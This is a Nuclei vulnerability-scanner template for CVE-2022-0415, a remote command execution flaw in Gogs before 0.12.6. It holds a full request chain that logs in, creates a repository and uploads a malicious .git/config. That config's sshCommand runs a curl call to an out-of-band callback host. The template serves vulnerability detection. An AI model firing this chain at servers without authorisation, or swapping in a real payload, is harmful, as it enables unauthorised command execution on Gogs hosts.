nuclei-templates/http/cves/2022/CVE-2022-0415.yaml

121 lines
3.8 KiB
YAML

id: CVE-2022-0415
info:
name: Gogs <0.12.6 - Remote Command Execution
author: theamanrawat
severity: high
description: |
Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
remediation: Fixed in version 0.12.6.
reference:
- https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284
- https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902
- https://nvd.nist.gov/vuln/detail/CVE-2022-0415
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-0415
cwe-id: CWE-434,CWE-20
epss-score: 0.1488
epss-percentile: 0.95172
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
vendor: gogs
product: gogs
tags: rce,gogs,authenticated,huntr,cve,cve2022,intrusive
http:
- raw:
- |
GET /user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
- |
GET /repo/create HTTP/1.1
Host: {{Hostname}}
- |
POST /repo/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on
- |
POST /{{username}}/{{randstr}}/upload-file HTTP/1.1
Host: {{Hostname}}
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Csrf-Token: {{auth_csrf}}
Content-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395
-----------------------------313811965223810628771946318395
Content-Disposition: form-data; name="file"; filename="config"
Content-Type: application/octet-stream
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = curl http://{{interactsh-url}} -I
[remote "origin"]
url = git@github.com:torvalds/linux.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
-----------------------------313811965223810628771946318395--
- |
POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- http
- type: word
part: body_1
words:
- content="Gogs
extractors:
- type: regex
name: csrf
group: 1
regex:
- name="_csrf" value="(.*)"
internal: true
- type: regex
name: auth_csrf
group: 1
regex:
- name="_csrf" content="(.*)"
internal: true
- type: regex
name: uuid
group: 1
regex:
- ' "uuid": "(.*)"'
internal: true
# digest: 4b0a00483046022100a1b436cefb672af210e6e163d07b23eeaf228b17e2c1a2f5845950d9eafa477902210081840bcb08e7b68db96c3ea2adf6ba41fe92db5f91e4e374185ad643a61dce14:922c64590222798bb761d5b6d8e72950